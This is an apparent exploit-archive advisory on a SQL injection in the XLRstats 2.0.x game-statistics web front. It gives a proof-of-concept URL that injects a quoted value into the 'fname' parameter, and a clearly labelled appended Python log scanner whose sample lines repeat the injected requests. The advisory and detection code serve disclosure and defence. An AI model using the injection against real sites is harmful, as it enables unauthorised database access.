[webapps / 0day] - Xlrstats 2.0.1 SQL Injection Vulnerability
Posted on 14 October 2010
<pre>
==========================================
Xlrstats 2.0.1 SQL Injection Vulnerability
==========================================

# Author : Sky4
# Email : Sky4@live.com
# Date : 14/10/2010
# homepage : http://www.sky4.tk
# Software Link: http://www.bigbrotherbot.net/forums/downloads/?sa=view;down=100
# Script homepage: http://www.xlrstats.com/
# Version: 2.0.1 / 2.0.2 / 2.0.3
----------------------------------------------------------
[About The Program]

XLRstats is the only Real Time game stats program out there. When you make a kill in game, it's in the stats at the very same moment! No cronjobs and perl programs to generate statistics... REAL TIME!

XLRstats is a statistics plugin for BigBrotherBot (B3) and it stores all kill-events in a mySQL database. Stats are available in game using the !xlrstats command in chat, but much more can be viewed in the XLRstats web front!

Analyze your weapon usage, where do you hit your enemies, who are your worst enemies... all this and more information is available on the site.

Version 2 comes with ranks, medals and several templates. With the templates it's very easy to create your own look and feel. Create your own template matching your clan's website... no problem.
-----------------------------------------------------------
<<[ Exploit ]>>--

http://www.localhost.com/xlrstats/index.php?func=medal&fname=1

[demo]
http://www.localhost.com/xlrstats/index.php?func=medal&fname='1'
------------------------------------

##############################################################
# www.sky4.tk #
# sky4@live.com
# 4hm4d H0w4ri
# Palestine In our Hearts
##############################################################

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-14]
</pre>
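The following is an added example, not part of the original advisory or of XLRstats: a log check that flags requests to `index.php?func=medal` whose `fname` value is not a plain identifier, as in the quoted demo request above. The allowlist pattern, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate fname values are plain identifiers.
SAFE_FNAME = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_fname(url):
    """Return the decoded fname if the request targets func=medal with an
    fname outside the allowlist, otherwise None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "medal" not in params.get("func", []):
        return None
    for value in params.get("fname", []):
        # parse_qs decodes once; decode again to catch double-encoded input.
        decoded = unquote(value)
        if not SAFE_FNAME.fullmatch(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, client_ip, fname) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_fname(match.group(1))
        if value is not None:
            hits.append((number, line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Oct/2010:10:00:01 +0000] "GET /xlrstats/index.php?func=medal&fname=1 HTTP/1.1" 200 5120
198.51.100.7 - - [14/Oct/2010:10:00:05 +0000] "GET /xlrstats/index.php?func=medal&fname='1' HTTP/1.1" 200 812
198.51.100.7 - - [14/Oct/2010:10:00:09 +0000] "GET /xlrstats/index.php?func=medal&fname=%25271%2527 HTTP/1.1" 200 812
203.0.113.4 - - [14/Oct/2010:10:00:12 +0000] "GET /xlrstats/index.php HTTP/1.1" 200 7311
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allowlist, applied server-side before `fname` reaches any query, is the corresponding input-validation control; parameterized queries remain the primary fix.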